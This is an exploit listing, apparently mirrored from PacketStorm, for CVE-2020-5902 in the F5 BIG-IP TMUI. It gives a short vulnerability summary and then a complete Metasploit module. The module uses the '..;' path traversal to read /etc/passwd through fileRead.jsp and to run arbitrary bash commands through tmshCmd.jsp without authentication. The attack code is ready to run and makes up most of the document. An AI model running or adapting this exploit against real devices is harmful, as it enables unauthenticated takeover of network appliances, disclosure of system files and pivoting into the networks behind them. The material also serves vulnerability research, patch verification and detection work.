## https://sploitus.com/exploit?id=PACKETSTORM:216759
=============================================================================================================================================
| # Title : F5 BIG-IP TMUI Unauthenticated Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.f5.com/fr_fr/products/big-ip |
=============================================================================================================================================
[+] Summary : A critical vulnerability exists in the Traffic Management User Interface (TMUI) component of F5 Networks F5 BIG-IP devices that allows
unauthenticated attackers to perform remote command execution (RCE) through a directory traversal flaw.
The issue is tracked as CVE-2020-5902 and affects multiple versions of BIG-IP where the TMUI administrative interface is exposed.
The vulnerability stems from improper input validation in TMUI endpoints such as fileRead.jsp and tmshCmd.jsp.
By exploiting a crafted path containing the traversal sequence ..;, an attacker can bypass authentication and access internal JSP components. This allows:
Arbitrary file read (e.g., /etc/passwd)
Execution of system commands via tmsh utilities
Full compromise of the affected BIG-IP system
Attackers can issue specially crafted HTTP requests to the vulnerable TMUI interface, enabling them to execute commands as the underlying system user without authentication.
[+] Successful exploitation may result in:
Remote command execution on the device
Disclosure of sensitive system files
Complete takeover of the BIG-IP appliance
Potential network pivoting if the device sits in a trusted infrastructure position
[+] This vulnerability was publicly disclosed on 1 July 2020 and is considered critical severity, with active exploitation observed shortly after disclosure.
Affected Product: F5 BIG-IP TMUI
Vendor: F5 Networks
CVE:CVE-2020-5902
[+] Impact:
Unauthenticated Remote Code Execution
Arbitrary File Disclosure
Full System Compromise
[+] POC :
##
# Exploit Title: F5 BIG-IP TMUI Remote Code Execution
# Framework: Metasploit
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'F5 BIG-IP TMUI Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal vulnerability in the
F5 BIG-IP TMUI interface that allows unauthenticated attackers
to execute arbitrary system commands via tmshCmd.jsp.
},
'Author' =>
[
'indoushka'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-5902'],
['URL', 'https://support.f5.com/csp/article/K52145254']
],
'Platform' => 'linux',
'Arch' => [ ARCH_CMD ],
'Targets' =>
[
['Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-07-01'
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
OptString.new('FILEPATH', [ false, 'File to read for vulnerability check', '/etc/passwd' ])
]
)
end
def check
print_status("Checking if target is vulnerable...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(
target_uri.path,
'tmui',
'login.jsp',
'..;',
'tmui',
'locallb',
'workspace',
'fileRead.jsp'
),
'vars_get' =>
{
'fileName' => datastore['FILEPATH']
}
})
return CheckCode::Unknown unless res
if res.code == 200 && res.body.include?('root:')
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def exploit
print_status("Launching exploit...")
execute_command(payload.encoded)
end
def execute_command(cmd, opts = {})
vprint_status("Executing command: #{cmd}")
encoded = Rex::Text.uri_encode("run util bash -c '#{cmd}'")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(
target_uri.path,
'tmui',
'login.jsp',
'..;',
'tmui',
'locallb',
'workspace',
'tmshCmd.jsp'
),
'vars_get' =>
{
'command' => encoded
}
})
fail_with(Failure::Unknown, "No response from server") unless res
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================